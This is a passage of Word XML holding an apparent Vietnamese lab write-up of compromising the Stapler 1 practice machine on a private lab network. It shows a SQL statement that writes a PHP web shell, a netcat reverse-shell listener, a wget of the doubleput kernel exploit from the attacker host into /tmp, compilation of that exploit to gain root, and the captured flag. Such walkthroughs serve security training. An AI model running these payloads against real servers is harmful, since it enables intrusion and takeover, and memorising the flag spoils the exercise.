            <wp:extent cx="4754880" cy="2599586"/>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754880" cy="2599586"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Hình 10. Trang đăng nhập phpMyAdmin sử dụng thông tin lấy từ wp-config.php.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="C00000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>SELECT "&lt;?php echo shell_exec($_GET['cmd']); ?&gt;" INTO OUTFILE "/var/www/https/blogblog/wp-content/uploads/shell.php";</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>Câu lệnh SQL trên tạo tệp PHP có khả năng nhận tham số cmd. Đây là bước trực tiếp dẫn tới quyền thực thi lệnh trên máy chủ web trong phạm vi lab.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>3.4. Kiểm tra thư mục uploads và phpMyAdmin</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="C00000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>https://192.168.56.107:12380/blogblog/wp-content/uploads/</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="C00000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>https://192.168.56.107:12380/phpmyadmin/</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>Thư mục uploads cho phép quan sát các tệp đã được tải lên. Trang phpMyAdmin được dùng để quản trị cơ sở dữ liệu của WordPress.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
            <wp:extent cx="5852160" cy="3031984"/>
            <wp:docPr id="5" name="Picture 5"/>
            <wp:cNvGraphicFramePr>
              <a:graphicFrameLocks noChangeAspect="1"/>
            </wp:cNvGraphicFramePr>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image(378).png"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId13"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5852160" cy="3031984"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Hình 11. Directory listing của thư mục uploads.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
            <wp:extent cx="5760720" cy="3149499"/>
            <wp:docPr id="6" name="Picture 6"/>
            <wp:cNvGraphicFramePr>
              <a:graphicFrameLocks noChangeAspect="1"/>
            </wp:cNvGraphicFramePr>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image(379).png"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId14"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5760720" cy="3149499"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Hình 12. Trang đăng nhập phpMyAdmin.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t>4. Truy cập ban đầu qua web shell</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>4.1. Kiểm tra web shell trong thư mục uploads</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="C00000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>SELECT "&lt;?php echo shell_exec($_GET['cmd']); ?&gt;" INTO OUTFILE "/var/www/https/blogblog/wp-content/uploads/shell.php";</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>Sau khi thực thi câu lệnh SQL trong phpMyAdmin, truy cập shell.php với tham số cmd để xác nhận khả năng thực thi lệnh hệ thống.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="C00000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>https://192.168.56.107:12380/blogblog/wp-content/uploads/shell.php?cmd=hostname</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>Kết quả trả về hostname red.initech, xác nhận web shell hoạt động.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
            <wp:extent cx="5943600" cy="1669486"/>
            <wp:docPr id="7" name="Picture 7"/>
            <wp:cNvGraphicFramePr>
              <a:graphicFrameLocks noChangeAspect="1"/>
            </wp:cNvGraphicFramePr>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image(390).png"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId15"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="1669486"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Hình 14. Web shell thực thi lệnh hostname thành công.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>4.2. Nhận reverse shell</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="C00000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>nc -lvnp 4444</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>Kali mở listener tại cổng 4444. Sau khi gọi payload từ web shell, máy mục tiêu kết nối ngược về Kali.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>Kết quả kiểm tra trong shell:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="C00000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>whoami</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="C00000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>id</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="C00000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>hostname</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="C00000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>pwd</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="C00000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>python -c 'import pty; pty.spawn("/bin/bash")'</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="C00000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>lsb_release -a</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="C00000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>uname -a</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>Kết quả: quyền ban đầu là www-data; hệ điều hành Ubuntu 16.04 LTS; kernel 4.4.0-21-generic i686.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
            <wp:extent cx="5943600" cy="3521258"/>
            <wp:docPr id="8" name="Picture 8"/>
            <wp:cNvGraphicFramePr>
              <a:graphicFrameLocks noChangeAspect="1"/>
            </wp:cNvGraphicFramePr>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image(392).png"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId16"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="3521258"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Hình 15. Reverse shell thành công và xác định thông tin hệ điều hành/kernel.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t>5. Leo thang đặc quyền</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>5.1. Chuẩn bị và chuyển exploit</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>Trên Kali, tải gói exploit 39772 và giải nén để lấy exploit.tar và crasher.tar. Sau đó mở HTTP server tại thư mục chứa tệp.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="C00000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>wget https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/39772.zip</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="C00000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>unzip 39772.zip</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="C00000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>cd /home/kali/39772</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="C00000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>python3 -m http.server 8000</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
            <wp:extent cx="5943600" cy="1954413"/>
            <wp:docPr id="9" name="Picture 9"/>
            <wp:cNvGraphicFramePr>
              <a:graphicFrameLocks noChangeAspect="1"/>
            </wp:cNvGraphicFramePr>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image(394).png"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId17"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="1954413"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Hình 16. Tải và giải nén gói exploit trên Kali.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>Từ reverse shell trên Stapler 1, tải các tệp về thư mục /tmp và giải nén.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="C00000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>cd /tmp</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="C00000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>wget http://192.168.56.105:8000/exploit.tar</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="C00000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>wget http://192.168.56.105:8000/crasher.tar</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="C00000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>tar -xvf exploit.tar</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="C00000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>tar -xvf crasher.tar</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
            <wp:extent cx="5760720" cy="5102518"/>
            <wp:docPr id="10" name="Picture 10"/>
            <wp:cNvGraphicFramePr>
              <a:graphicFrameLocks noChangeAspect="1"/>
            </wp:cNvGraphicFramePr>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image(395).png"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId18"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5760720" cy="5102518"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Hình 17. Chuyển và giải nén exploit trên máy mục tiêu.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>5.2. Biên dịch và chạy doubleput</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="C00000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>cd /tmp/ebpf_mapfd_doubleput_exploit</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="C00000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>chmod +x compile.sh</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="C00000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>./compile.sh</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>Quá trình biên dịch xuất hiện cảnh báo kiểu dữ liệu nhưng vẫn tạo được các tệp thực thi doubleput, hello và suidhelper.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
            <wp:extent cx="5852160" cy="4931791"/>
            <wp:docPr id="11" name="Picture 11"/>
            <wp:cNvGraphicFramePr>
              <a:graphicFrameLocks noChangeAspect="1"/>
            </wp:cNvGraphicFramePr>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image(396).png"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId19"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5852160" cy="4931791"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Hình 18. Biên dịch exploit thành công.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="C00000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>./doubleput</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>Exploit thông báo đã tái sử dụng con trỏ và sẽ tạo root shell trong tối đa khoảng 60 giây.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
            <wp:extent cx="5669280" cy="3034078"/>
            <wp:docPr id="12" name="Picture 12"/>
            <wp:cNvGraphicFramePr>
              <a:graphicFrameLocks noChangeAspect="1"/>
            </wp:cNvGraphicFramePr>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image(397).png"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId20"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5669280" cy="3034078"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Hình 19. Chạy doubleput và chờ tạo root shell.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t>6. Kết quả hoàn thành</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>Sau khi exploit hoàn tất, hệ thống phát hiện tệp SUID và khởi chạy root shell. Các lệnh kiểm tra xác nhận quyền cao nhất:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="C00000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>whoami</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="C00000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>id</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>Kết quả: root và uid=0(root), gid=0(root).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
            <wp:extent cx="5760720" cy="2841579"/>
            <wp:docPr id="13" name="Picture 13"/>
            <wp:cNvGraphicFramePr>
              <a:graphicFrameLocks noChangeAspect="1"/>
            </wp:cNvGraphicFramePr>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image(398).png"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId21"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5760720" cy="2841579"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Hình 20. Leo thang đặc quyền thành công lên root.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>Tiếp tục truy cập thư mục /root và đọc flag:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="C00000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>cd /root</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="C00000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>ls</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="C00000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>cat flag.txt</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>Flag thu được: b6b545dc11b7a270f4bad23432190c75162c4a2b</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:drawing>
